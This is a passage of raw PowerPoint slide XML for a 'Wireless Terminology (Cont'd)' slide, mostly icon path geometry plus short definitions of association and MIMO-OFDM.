              <a:gd name="T37" fmla="*/ 2005 h 20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206" h="2035">
                <a:moveTo>
                  <a:pt x="1085" y="2005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="823" y="2005"/>
                  <a:pt x="571" y="1902"/>
                  <a:pt x="383" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="1331"/>
                  <a:pt x="0" y="703"/>
                  <a:pt x="383" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="126"/>
                  <a:pt x="823" y="23"/>
                  <a:pt x="1085" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1354" y="23"/>
                  <a:pt x="1600" y="126"/>
                  <a:pt x="1788" y="314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2177" y="703"/>
                  <a:pt x="2177" y="1331"/>
                  <a:pt x="1788" y="1714"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1600" y="1902"/>
                  <a:pt x="1354" y="2005"/>
                  <a:pt x="1085" y="2005"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="817" y="0"/>
                  <a:pt x="560" y="103"/>
                  <a:pt x="366" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="486"/>
                  <a:pt x="68" y="743"/>
                  <a:pt x="68" y="1017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="1285"/>
                  <a:pt x="177" y="1542"/>
                  <a:pt x="366" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="560" y="1925"/>
                  <a:pt x="817" y="2034"/>
                  <a:pt x="1085" y="2034"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2034"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1360" y="2034"/>
                  <a:pt x="1611" y="1925"/>
                  <a:pt x="1805" y="1737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2205" y="1337"/>
                  <a:pt x="2205" y="691"/>
                  <a:pt x="1805" y="297"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1611" y="103"/>
                  <a:pt x="1360" y="0"/>
                  <a:pt x="1085" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1085" y="2005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116" name="TextBox 115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192055" y="1834616"/>
            <a:ext cx="1499092" cy="369314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</a:rPr>
              <a:t>Association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92944" y="2173480"/>
            <a:ext cx="3303381" cy="638875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>The process of connecting a wireless device to an AP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="133" name="Group 132"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7662767" y="1828800"/>
            <a:ext cx="702462" cy="647130"/>
            <a:chOff x="13296063" y="10607541"/>
            <a:chExt cx="1265763" cy="1166060"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="135" name="Freeform 269"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13349333" y="10670914"/>
              <a:ext cx="1141470" cy="1039314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 994 w 1989"/>
                <a:gd name="T1" fmla="*/ 0 h 1812"/>
                <a:gd name="T2" fmla="*/ 994 w 1989"/>
                <a:gd name="T3" fmla="*/ 0 h 1812"/>
                <a:gd name="T4" fmla="*/ 354 w 1989"/>
                <a:gd name="T5" fmla="*/ 268 h 1812"/>
                <a:gd name="T6" fmla="*/ 354 w 1989"/>
                <a:gd name="T7" fmla="*/ 1548 h 1812"/>
                <a:gd name="T8" fmla="*/ 994 w 1989"/>
                <a:gd name="T9" fmla="*/ 1811 h 1812"/>
                <a:gd name="T10" fmla="*/ 1634 w 1989"/>
                <a:gd name="T11" fmla="*/ 1548 h 1812"/>
                <a:gd name="T12" fmla="*/ 1634 w 1989"/>
                <a:gd name="T13" fmla="*/ 268 h 1812"/>
                <a:gd name="T14" fmla="*/ 994 w 1989"/>
                <a:gd name="T15" fmla="*/ 0 h 1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89" h="1812">
                  <a:moveTo>
                    <a:pt x="994" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="994" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="766" y="0"/>
                    <a:pt x="532" y="91"/>
                    <a:pt x="354" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="622"/>
                    <a:pt x="0" y="1194"/>
                    <a:pt x="354" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="532" y="1725"/>
                    <a:pt x="766" y="1811"/>
                    <a:pt x="994" y="1811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="1811"/>
                    <a:pt x="1457" y="1725"/>
                    <a:pt x="1634" y="1548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1988" y="1194"/>
                    <a:pt x="1988" y="622"/>
                    <a:pt x="1634" y="268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1457" y="91"/>
                    <a:pt x="1229" y="0"/>
                    <a:pt x="994" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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36" name="Freeform 270"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="13296063" y="10607541"/>
              <a:ext cx="1265763" cy="1166060"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1085 w 2206"/>
                <a:gd name="T1" fmla="*/ 2005 h 2035"/>
                <a:gd name="T2" fmla="*/ 1085 w 2206"/>
                <a:gd name="T3" fmla="*/ 2005 h 2035"/>
                <a:gd name="T4" fmla="*/ 383 w 2206"/>
                <a:gd name="T5" fmla="*/ 1714 h 2035"/>
                <a:gd name="T6" fmla="*/ 383 w 2206"/>
                <a:gd name="T7" fmla="*/ 314 h 2035"/>
                <a:gd name="T8" fmla="*/ 1085 w 2206"/>
                <a:gd name="T9" fmla="*/ 23 h 2035"/>
                <a:gd name="T10" fmla="*/ 1788 w 2206"/>
                <a:gd name="T11" fmla="*/ 314 h 2035"/>
                <a:gd name="T12" fmla="*/ 1788 w 2206"/>
                <a:gd name="T13" fmla="*/ 1714 h 2035"/>
                <a:gd name="T14" fmla="*/ 1085 w 2206"/>
                <a:gd name="T15" fmla="*/ 2005 h 2035"/>
                <a:gd name="T16" fmla="*/ 1085 w 2206"/>
                <a:gd name="T17" fmla="*/ 0 h 2035"/>
                <a:gd name="T18" fmla="*/ 1085 w 2206"/>
                <a:gd name="T19" fmla="*/ 0 h 2035"/>
                <a:gd name="T20" fmla="*/ 366 w 2206"/>
                <a:gd name="T21" fmla="*/ 297 h 2035"/>
                <a:gd name="T22" fmla="*/ 68 w 2206"/>
                <a:gd name="T23" fmla="*/ 1017 h 2035"/>
                <a:gd name="T24" fmla="*/ 366 w 2206"/>
                <a:gd name="T25" fmla="*/ 1737 h 2035"/>
                <a:gd name="T26" fmla="*/ 1085 w 2206"/>
                <a:gd name="T27" fmla="*/ 2034 h 2035"/>
                <a:gd name="T28" fmla="*/ 1085 w 2206"/>
                <a:gd name="T29" fmla="*/ 2034 h 2035"/>
                <a:gd name="T30" fmla="*/ 1805 w 2206"/>
                <a:gd name="T31" fmla="*/ 1737 h 2035"/>
                <a:gd name="T32" fmla="*/ 1805 w 2206"/>
                <a:gd name="T33" fmla="*/ 297 h 2035"/>
                <a:gd name="T34" fmla="*/ 1085 w 2206"/>
                <a:gd name="T35" fmla="*/ 0 h 2035"/>
                <a:gd name="T36" fmla="*/ 1085 w 2206"/>
                <a:gd name="T37" fmla="*/ 2005 h 20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06" h="2035">
                  <a:moveTo>
                    <a:pt x="1085" y="2005"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="823" y="2005"/>
                    <a:pt x="571" y="1902"/>
                    <a:pt x="383" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1331"/>
                    <a:pt x="0" y="703"/>
                    <a:pt x="383" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="571" y="126"/>
                    <a:pt x="823" y="23"/>
                    <a:pt x="1085" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1354" y="23"/>
                    <a:pt x="1600" y="126"/>
                    <a:pt x="1788" y="314"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177" y="703"/>
                    <a:pt x="2177" y="1331"/>
                    <a:pt x="1788" y="1714"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1600" y="1902"/>
                    <a:pt x="1354" y="2005"/>
                    <a:pt x="1085" y="2005"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1085" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="817" y="0"/>
                    <a:pt x="560" y="103"/>
                    <a:pt x="366" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="486"/>
                    <a:pt x="68" y="743"/>
                    <a:pt x="68" y="1017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1285"/>
                    <a:pt x="177" y="1542"/>
                    <a:pt x="366" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="560" y="1925"/>
                    <a:pt x="817" y="2034"/>
                    <a:pt x="1085" y="2034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2034"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1360" y="2034"/>
                    <a:pt x="1611" y="1925"/>
                    <a:pt x="1805" y="1737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2205" y="1337"/>
                    <a:pt x="2205" y="691"/>
                    <a:pt x="1805" y="297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1611" y="103"/>
                    <a:pt x="1360" y="0"/>
                    <a:pt x="1085" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1085" y="2005"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/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134" name="Freeform 116"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7883191" y="1996424"/>
            <a:ext cx="266368" cy="276915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 400 w 445"/>
              <a:gd name="T1" fmla="*/ 159 h 462"/>
              <a:gd name="T2" fmla="*/ 400 w 445"/>
              <a:gd name="T3" fmla="*/ 159 h 462"/>
              <a:gd name="T4" fmla="*/ 266 w 445"/>
              <a:gd name="T5" fmla="*/ 8 h 462"/>
              <a:gd name="T6" fmla="*/ 36 w 445"/>
              <a:gd name="T7" fmla="*/ 248 h 462"/>
              <a:gd name="T8" fmla="*/ 9 w 445"/>
              <a:gd name="T9" fmla="*/ 319 h 462"/>
              <a:gd name="T10" fmla="*/ 81 w 445"/>
              <a:gd name="T11" fmla="*/ 355 h 462"/>
              <a:gd name="T12" fmla="*/ 98 w 445"/>
              <a:gd name="T13" fmla="*/ 346 h 462"/>
              <a:gd name="T14" fmla="*/ 134 w 445"/>
              <a:gd name="T15" fmla="*/ 372 h 462"/>
              <a:gd name="T16" fmla="*/ 160 w 445"/>
              <a:gd name="T17" fmla="*/ 434 h 462"/>
              <a:gd name="T18" fmla="*/ 187 w 445"/>
              <a:gd name="T19" fmla="*/ 452 h 462"/>
              <a:gd name="T20" fmla="*/ 240 w 445"/>
              <a:gd name="T21" fmla="*/ 434 h 462"/>
              <a:gd name="T22" fmla="*/ 249 w 445"/>
              <a:gd name="T23" fmla="*/ 416 h 462"/>
              <a:gd name="T24" fmla="*/ 231 w 445"/>
              <a:gd name="T25" fmla="*/ 390 h 462"/>
              <a:gd name="T26" fmla="*/ 204 w 445"/>
              <a:gd name="T27" fmla="*/ 337 h 462"/>
              <a:gd name="T28" fmla="*/ 231 w 445"/>
              <a:gd name="T29" fmla="*/ 310 h 462"/>
              <a:gd name="T30" fmla="*/ 417 w 445"/>
              <a:gd name="T31" fmla="*/ 355 h 462"/>
              <a:gd name="T32" fmla="*/ 400 w 445"/>
              <a:gd name="T33" fmla="*/ 159 h 462"/>
              <a:gd name="T34" fmla="*/ 390 w 445"/>
              <a:gd name="T35" fmla="*/ 310 h 462"/>
              <a:gd name="T36" fmla="*/ 390 w 445"/>
              <a:gd name="T37" fmla="*/ 310 h 462"/>
              <a:gd name="T38" fmla="*/ 302 w 445"/>
              <a:gd name="T39" fmla="*/ 204 h 462"/>
              <a:gd name="T40" fmla="*/ 284 w 445"/>
              <a:gd name="T41" fmla="*/ 62 h 462"/>
              <a:gd name="T42" fmla="*/ 364 w 445"/>
              <a:gd name="T43" fmla="*/ 177 h 462"/>
              <a:gd name="T44" fmla="*/ 390 w 445"/>
              <a:gd name="T45" fmla="*/ 310 h 4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45" h="462">
                <a:moveTo>
                  <a:pt x="400" y="159"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="159"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="364" y="71"/>
                  <a:pt x="302" y="0"/>
                  <a:pt x="266" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="36"/>
                  <a:pt x="302" y="142"/>
                  <a:pt x="36" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="257"/>
                  <a:pt x="0" y="292"/>
                  <a:pt x="9" y="319"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="337"/>
                  <a:pt x="53" y="363"/>
                  <a:pt x="81" y="355"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="98" y="346"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="372"/>
                  <a:pt x="134" y="355"/>
                  <a:pt x="134" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="390"/>
                  <a:pt x="160" y="425"/>
                  <a:pt x="160" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="443"/>
                  <a:pt x="178" y="461"/>
                  <a:pt x="187" y="452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="452"/>
                  <a:pt x="231" y="443"/>
                  <a:pt x="240" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="434"/>
                  <a:pt x="257" y="425"/>
                  <a:pt x="249" y="416"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="408"/>
                  <a:pt x="231" y="399"/>
                  <a:pt x="231" y="390"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="381"/>
                  <a:pt x="213" y="346"/>
                  <a:pt x="204" y="337"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="328"/>
                  <a:pt x="213" y="310"/>
                  <a:pt x="231" y="310"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="355" y="302"/>
                  <a:pt x="373" y="372"/>
                  <a:pt x="417" y="355"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="444" y="346"/>
                  <a:pt x="444" y="248"/>
                  <a:pt x="400" y="159"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="390" y="310"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="390" y="310"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="381" y="310"/>
                  <a:pt x="328" y="275"/>
                  <a:pt x="302" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="275" y="133"/>
                  <a:pt x="275" y="62"/>
                  <a:pt x="284" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="62"/>
                  <a:pt x="337" y="106"/>
                  <a:pt x="364" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="400" y="248"/>
                  <a:pt x="390" y="302"/>
                  <a:pt x="390" y="3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126" name="TextBox 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8456736" y="1836768"/>
            <a:ext cx="1811678" cy="369314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</a:rPr>
              <a:t>MIMO-OFDM</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="id-ID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Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="TextBox 127"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8441202" y="2168975"/>
            <a:ext cx="3357854" cy="638875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914217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MingLiU_HKSCS" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Lato Light"/>
              </a:rPr>
              <a:t>An air interface for 4G and 5G broadband wireless communications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{154CA3C1-DCDD-48DF-87CC-0E6AF651B77E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149" r="39149"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5164138" y="1295400"/>
            <a:ext cx="1900237" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="TextBox 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18C0D655-1C1A-4713-855C-482212DE2FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2595036" y="241509"/>
            <a:ext cx="7001963" cy="600156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="45711" tIns="22856" rIns="45711" bIns="22856" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217"/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Wireless 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Terminology (Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="id-ID" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Lato" charset="0"/>
              <a:ea typeface="Lato" charset="0"/>
              <a:cs typeface="Lato" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Freeform 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63CE2914-01D1-48F9-9420-5065CB81925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983234" y="2010595"/>
            <a:ext cx="305905" cy="299877"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 202432 w 62"/>
              <a:gd name="T1" fmla="*/ 185277 h 62"/>
              <a:gd name="T2" fmla="*/ 181846 w 62"/>
              <a:gd name="T3" fmla="*/ 202432 h 62"/>
              <a:gd name="T4" fmla="*/ 154397 w 62"/>
              <a:gd name="T5" fmla="*/ 212725 h 62"/>
              <a:gd name="T6" fmla="*/ 130380 w 62"/>
              <a:gd name="T7" fmla="*/ 202432 h 62"/>
              <a:gd name="T8" fmla="*/ 102931 w 62"/>
              <a:gd name="T9" fmla="*/ 174983 h 62"/>
              <a:gd name="T10" fmla="*/ 92638 w 62"/>
              <a:gd name="T11" fmla="*/ 147535 h 62"/>
              <a:gd name="T12" fmla="*/ 102931 w 62"/>
              <a:gd name="T13" fmla="*/ 123518 h 62"/>
              <a:gd name="T14" fmla="*/ 92638 w 62"/>
              <a:gd name="T15" fmla="*/ 109794 h 62"/>
              <a:gd name="T16" fmla="*/ 65190 w 62"/>
              <a:gd name="T17" fmla="*/ 123518 h 62"/>
              <a:gd name="T18" fmla="*/ 37742 w 62"/>
              <a:gd name="T19" fmla="*/ 109794 h 62"/>
              <a:gd name="T20" fmla="*/ 10293 w 62"/>
              <a:gd name="T21" fmla="*/ 82345 h 62"/>
              <a:gd name="T22" fmla="*/ 0 w 62"/>
              <a:gd name="T23" fmla="*/ 58328 h 62"/>
              <a:gd name="T24" fmla="*/ 10293 w 62"/>
              <a:gd name="T25" fmla="*/ 30879 h 62"/>
              <a:gd name="T26" fmla="*/ 30879 w 62"/>
              <a:gd name="T27" fmla="*/ 10293 h 62"/>
              <a:gd name="T28" fmla="*/ 58328 w 62"/>
              <a:gd name="T29" fmla="*/ 0 h 62"/>
              <a:gd name="T30" fmla="*/ 82345 w 62"/>
              <a:gd name="T31" fmla="*/ 13724 h 62"/>
              <a:gd name="T32" fmla="*/ 109794 w 62"/>
              <a:gd name="T33" fmla="*/ 37742 h 62"/>
              <a:gd name="T34" fmla="*/ 120087 w 62"/>
              <a:gd name="T35" fmla="*/ 65190 h 62"/>
              <a:gd name="T36" fmla="*/ 109794 w 62"/>
              <a:gd name="T37" fmla="*/ 92638 h 62"/>
              <a:gd name="T38" fmla="*/ 120087 w 62"/>
              <a:gd name="T39" fmla="*/ 102931 h 62"/>
              <a:gd name="T40" fmla="*/ 147535 w 62"/>
              <a:gd name="T41" fmla="*/ 92638 h 62"/>
              <a:gd name="T42" fmla="*/ 174983 w 62"/>
              <a:gd name="T43" fmla="*/ 102931 h 62"/>
              <a:gd name="T44" fmla="*/ 202432 w 62"/>
              <a:gd name="T45" fmla="*/ 130380 h 62"/>
              <a:gd name="T46" fmla="*/ 212725 w 62"/>
              <a:gd name="T47" fmla="*/ 157828 h 62"/>
              <a:gd name="T48" fmla="*/ 202432 w 62"/>
              <a:gd name="T49" fmla="*/ 185277 h 62"/>
              <a:gd name="T50" fmla="*/ 92638 w 62"/>
              <a:gd name="T51" fmla="*/ 58328 h 62"/>
              <a:gd name="T52" fmla="*/ 65190 w 62"/>
              <a:gd name="T53" fmla="*/ 30879 h 62"/>
              <a:gd name="T54" fmla="*/ 58328 w 62"/>
              <a:gd name="T55" fmla="*/ 27448 h 62"/>
              <a:gd name="T56" fmla="*/ 48035 w 62"/>
              <a:gd name="T57" fmla="*/ 30879 h 62"/>
              <a:gd name="T58" fmla="*/ 27448 w 62"/>
              <a:gd name="T59" fmla="*/ 48035 h 62"/>
              <a:gd name="T60" fmla="*/ 24017 w 62"/>
              <a:gd name="T61" fmla="*/ 58328 h 62"/>
              <a:gd name="T62" fmla="*/ 27448 w 62"/>
              <a:gd name="T63" fmla="*/ 65190 h 62"/>
              <a:gd name="T64" fmla="*/ 54897 w 62"/>
              <a:gd name="T65" fmla="*/ 92638 h 62"/>
              <a:gd name="T66" fmla="*/ 65190 w 62"/>
              <a:gd name="T67" fmla="*/ 96069 h 62"/>
              <a:gd name="T68" fmla="*/ 75483 w 62"/>
              <a:gd name="T69" fmla="*/ 92638 h 62"/>
              <a:gd name="T70" fmla="*/ 65190 w 62"/>
              <a:gd name="T71" fmla="*/ 78914 h 62"/>
              <a:gd name="T72" fmla="*/ 78914 w 62"/>
              <a:gd name="T73" fmla="*/ 65190 h 62"/>
              <a:gd name="T74" fmla="*/ 92638 w 62"/>
              <a:gd name="T75" fmla="*/ 75483 h 62"/>
              <a:gd name="T76" fmla="*/ 96069 w 62"/>
              <a:gd name="T77" fmla="*/ 65190 h 62"/>
              <a:gd name="T78" fmla="*/ 92638 w 62"/>
              <a:gd name="T79" fmla="*/ 58328 h 62"/>
              <a:gd name="T80" fmla="*/ 185277 w 62"/>
              <a:gd name="T81" fmla="*/ 147535 h 62"/>
              <a:gd name="T82" fmla="*/ 157828 w 62"/>
              <a:gd name="T83" fmla="*/ 120087 h 62"/>
              <a:gd name="T84" fmla="*/ 147535 w 62"/>
              <a:gd name="T85" fmla="*/ 116656 h 62"/>
              <a:gd name="T86" fmla="*/ 137242 w 62"/>
              <a:gd name="T87" fmla="*/ 123518 h 62"/>
              <a:gd name="T88" fmla="*/ 147535 w 62"/>
              <a:gd name="T89" fmla="*/ 137242 h 62"/>
              <a:gd name="T90" fmla="*/ 137242 w 62"/>
              <a:gd name="T91" fmla="*/ 147535 h 62"/>
              <a:gd name="T92" fmla="*/ 120087 w 62"/>
              <a:gd name="T93" fmla="*/ 140673 h 62"/>
              <a:gd name="T94" fmla="*/ 116656 w 62"/>
              <a:gd name="T95" fmla="*/ 147535 h 62"/>
              <a:gd name="T96" fmla="*/ 120087 w 62"/>
              <a:gd name="T97" fmla="*/ 157828 h 62"/>
              <a:gd name="T98" fmla="*/ 147535 w 62"/>
              <a:gd name="T99" fmla="*/ 185277 h 62"/>
              <a:gd name="T100" fmla="*/ 154397 w 62"/>
              <a:gd name="T101" fmla="*/ 188708 h 62"/>
              <a:gd name="T102" fmla="*/ 164690 w 62"/>
              <a:gd name="T103" fmla="*/ 185277 h 62"/>
              <a:gd name="T104" fmla="*/ 185277 w 62"/>
              <a:gd name="T105" fmla="*/ 164690 h 62"/>
              <a:gd name="T106" fmla="*/ 188708 w 62"/>
              <a:gd name="T107" fmla="*/ 157828 h 62"/>
              <a:gd name="T108" fmla="*/ 185277 w 62"/>
              <a:gd name="T109" fmla="*/ 147535 h 62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62" h="62">
                <a:moveTo>
                  <a:pt x="59" y="54"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="59"/>
                  <a:pt x="53" y="59"/>
                  <a:pt x="53" y="59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="61"/>
                  <a:pt x="48" y="62"/>
                  <a:pt x="45" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="62"/>
                  <a:pt x="40" y="61"/>
                  <a:pt x="38" y="59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="30" y="51"/>
                  <a:pt x="30" y="51"/>
                  <a:pt x="30" y="51"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="49"/>
                  <a:pt x="27" y="46"/>
                  <a:pt x="27" y="43"/>
